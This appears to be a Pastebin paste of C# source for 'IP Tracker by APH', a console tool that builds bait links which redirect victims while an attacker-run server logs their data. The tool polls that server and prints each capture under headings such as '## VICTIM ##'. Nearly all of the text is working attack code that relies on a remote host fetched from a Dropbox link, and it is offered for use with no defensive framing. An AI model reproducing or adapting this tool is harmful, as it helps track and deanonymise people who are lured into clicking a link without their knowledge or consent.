Advertisement
Guest User

Untitled

a guest
Aug 14th, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.04 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Net;
  7. using System.Threading;
  8. using System.Windows;
  9.  
  10. namespace IP_Tracker_by_4PH
  11. {
  12. class Program
  13. {
  14. static void Main(string[] args)
  15. {
  16. bool pass1, pass2, notfound;
  17. int time = 0;
  18. time = 0;
  19. pass1 = false;
  20. pass2 = false;
  21. notfound = true;
  22. string mainweb, mainserver, bait, mainid, redirLink, phpname, res, oldres;
  23. bait = "";
  24.  
  25. oldres = "";
  26. mainid = "";
  27. redirLink = "";
  28. phpname = "";
  29. res = "";
  30. Console.Title = "IP Tracker by APH";
  31. Console.ForegroundColor = ConsoleColor.DarkRed;
  32. Console.WriteLine(@" __ ______ ______ ______ ______ ______ __ __ ______ ______ ");
  33. Thread.Sleep(50);
  34. Console.WriteLine(@"/\ \ /\ == \ /\__ _\ /\ == \ /\ __ \ /\ ___\ /\ \/ / /\ ___\ /\ == \ ");
  35. Thread.Sleep(50);
  36. Console.WriteLine(@"\ \ \ \ \ _-/ \/_/\ \/ \ \ __< \ \ __ \ \ \ \____ \ \ _ -. \ \ __\ \ \ __< ");
  37. Thread.Sleep(50);
  38. Console.WriteLine(@" \ \_\ \ \_\ \ \_\ \ \_\ \_\ \ \_\ \_\ \ \_____\ \ \_\ \_\ \ \_____\ \ \_\ \_\ ");
  39. Thread.Sleep(50);
  40. Console.WriteLine(@" \/_/ \/_/ \/_/ \/_/ /_/ \/_/\/_/ \/_____/ \/_/\/_/ \/_____/ \/_/ /_/");
  41. Thread.Sleep(50);
  42. Console.ForegroundColor = ConsoleColor.DarkYellow;
  43. Console.WriteLine(@"┌┐ ┬ ┬ ┌─┐┌┬ ┐ ┬ ┬┬┬┌─┌─┐.");
  44. Thread.Sleep(50);
  45. Console.WriteLine(@"├┴┐└┬┘ ├─┤ │ │ ├─┤│├┴┐├─┤");
  46. Thread.Sleep(50);
  47. Console.WriteLine(@"└─┘ ┴ ┴ ┴─┴ ┘ ┴ ┴┴┴ ┴┴ ┴");
  48. Thread.Sleep(50);
  49. Console.WriteLine();
  50. Console.ForegroundColor = ConsoleColor.DarkGreen;
  51. Console.WriteLine(" > Checking internet access...");
  52. mainserver = "";
  53. mainweb = "";
  54. try
  55. {
  56. WebClient wc = new WebClient();
  57. mainweb = wc.DownloadString("https://dl.dropbox.com/s/ccfbcn60rceig8n/host.txt?dl=0");
  58. Console.ForegroundColor = ConsoleColor.Green;
  59. Console.WriteLine("DONE");
  60. pass1 = true;
  61. Console.ForegroundColor = ConsoleColor.DarkGreen;
  62. Console.WriteLine(" > Checking server status...");
  63. }
  64. catch
  65. {
  66. Console.ForegroundColor = ConsoleColor.Red;
  67. Console.WriteLine("No internet access.");
  68. pass1 = false;
  69. Console.WriteLine("<Press any key to quit>");
  70. Console.ReadKey();
  71. }
  72. if (pass1 == true)
  73. {
  74. try
  75. {
  76. WebClient wc = new WebClient();
  77. mainserver = wc.DownloadString(mainweb + "/Eira/status.txt");
  78. Console.ForegroundColor = ConsoleColor.Green;
  79. Console.WriteLine(mainserver);
  80. pass2 = true;
  81. }
  82. catch
  83. {
  84. Console.ForegroundColor = ConsoleColor.Red;
  85. Console.WriteLine("OFFLINE");
  86. Console.WriteLine("<Press any key to quit>");
  87. Console.ReadKey();
  88. }
  89. }
  90. if (pass2 == true)
  91. {
  92. Console.WriteLine();
  93. Console.ForegroundColor = ConsoleColor.DarkRed;
  94. Console.Write("Bait : ");
  95. Console.ForegroundColor = ConsoleColor.White;
  96. bait = Console.ReadLine();
  97. bait = bait.Replace(" ", "-");
  98. Console.ForegroundColor = ConsoleColor.DarkRed;
  99. Console.Write("Redirect to other link (require 'https://' or 'http://') : ");
  100. Console.ForegroundColor = ConsoleColor.White;
  101. redirLink = Console.ReadLine();
  102. Console.ForegroundColor = ConsoleColor.DarkRed;
  103. Console.Write("PHP File Name (fill it up to you, no need '.php') : ");
  104. Console.ForegroundColor = ConsoleColor.White;
  105. phpname = Console.ReadLine();
  106. phpname = phpname.Replace(" ", "-");
  107. Console.WriteLine();
  108. Console.ForegroundColor = ConsoleColor.DarkYellow;
  109. Console.WriteLine(" > Generating link...");
  110. WebClient del = new WebClient();
  111. del.OpenRead(mainweb + "/Eira/del.php?fn=" + phpname);
  112. WebClient wc = new WebClient();
  113. wc.OpenRead(mainweb+ "/Eira/makeget.php?phpname=" + phpname + "&bait=" +bait + "&rl=" + redirLink);
  114. Console.ForegroundColor = ConsoleColor.Cyan;
  115. Console.WriteLine(" > Link generated : " + mainweb + "/Eira/wkkw/" + phpname + ".php?src=/assets/source/" + bait);
  116. Console.WriteLine();
  117. Console.ForegroundColor = ConsoleColor.DarkYellow;
  118. Console.WriteLine("[ Copy the link, press anything to start listening ]");
  119. Console.ReadKey();
  120. Console.WriteLine();
  121. Console.ForegroundColor = ConsoleColor.Green;
  122. Console.WriteLine(" > Start Listening...");
  123. notfound = true;
  124. void listen()
  125. {
  126. try
  127. {
  128. Thread.Sleep(2000);
  129. WebClient l = new WebClient();
  130. res = l.DownloadString(mainweb + "/Eira/wkkw/" + phpname + ".txt");
  131. if (oldres == res)
  132. {
  133. listen();
  134. }
  135. else
  136. {
  137. oldres = res;
  138. Console.ForegroundColor = ConsoleColor.Blue;
  139. Console.WriteLine();
  140. Console.WriteLine("## VICTIM ##");
  141. Console.WriteLine();
  142. Console.ForegroundColor = ConsoleColor.DarkYellow;
  143. Console.WriteLine(res);
  144. listen();
  145. }
  146. }
  147. catch (Exception Ex)
  148. {
  149. Thread.Sleep(2000);
  150. time += 1;
  151. listen();
  152. }
  153. }
  154. void success()
  155. {
  156. Console.ForegroundColor = ConsoleColor.DarkBlue;
  157. WebClient delz = new WebClient();
  158. delz.OpenRead(mainweb + "/Eira/del.php?fn=" + phpname);
  159. Console.ForegroundColor = ConsoleColor.Blue;
  160. Console.WriteLine();
  161. Console.WriteLine("Time Taken : " + time + " seconds");
  162. Console.WriteLine("## VICTIM GET ##");
  163. Console.WriteLine();
  164. Console.ForegroundColor = ConsoleColor.DarkYellow;
  165. Console.WriteLine(res);
  166. Console.WriteLine();
  167. Console.ForegroundColor = ConsoleColor.Red;
  168. Console.WriteLine("<Press any key to quit>");
  169. Console.ReadKey();
  170. }
  171. if (notfound == true)
  172. {
  173. Thread.Sleep(1000);
  174. listen();
  175. }
  176. else
  177. {
  178. Console.WriteLine(res);
  179. Console.ReadLine();
  180. }
  181. }
  182. }
  183. }
  184. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement